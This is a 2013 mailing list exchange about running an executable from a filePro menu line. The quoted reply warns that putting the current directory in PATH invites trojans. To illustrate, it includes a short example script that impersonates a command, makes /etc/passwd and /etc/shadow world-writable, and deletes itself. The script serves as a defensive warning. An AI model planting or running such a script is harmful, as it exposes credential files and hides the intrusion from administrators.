excutable from menu line
Dennis Malen
dmalen at malen.com
Mon Jun 10 12:37:38 PDT 2013
Thanks to all of us for the heads up.
-----Original Message-----
From: filepro-list-bounces+dmalen=malen.com at lists.celestial.com
[mailto:filepro-list-bounces+dmalen=malen.com at lists.celestial.com] On Behalf
Of Bill Campbell
Sent: Monday, June 10, 2013 1:11 PM
To: filepro-list at lists.celestial.com
Subject: Re: excutable from menu line
On Mon, Jun 10, 2013, Dennis Malen wrote:
>Between Ken and Bill, I was able to correct the silly mistake.
The really silly mistake is having the current directory in your PATH as
this is one of the oldest methods of cracking *nix systems known. All a
cracker has to do is put a script in a likely place, say /tmp/ls or $HOME/ls
that will do nasties.
Something like this:
#!/bin/sh
me="$0"
progname=`basename $me`
# do something nasty
chmod 666 /etc/passwd /etc/shadow
# execute the real command
/bin/$progname "$@"
# remove the evidence
rm -rf $me
Bill
--
INTERNET: bill at celestial.com Bill Campbell; Celestial Software LLC
URL: http://www.celestial.com/ PO Box 820; 6641 E. Mercer Way
Voice: (206) 236-1676 Mercer Island, WA 98040-0820
Fax: (206) 232-9186 Skype: jwccsllc (206) 855-5792
You know the one thing that's wrong with this country? Everyone gets a
chance to have their fair say. -- Bill Clinton, May 29, 1993, The White
House _______________________________________________
Filepro-list mailing list
Filepro-list at lists.celestial.com
Subscribe/Unsubscribe/Subscription Changes
http://mailman.celestial.com/mailman/listinfo/filepro-list
More information about the Filepro-list
mailing list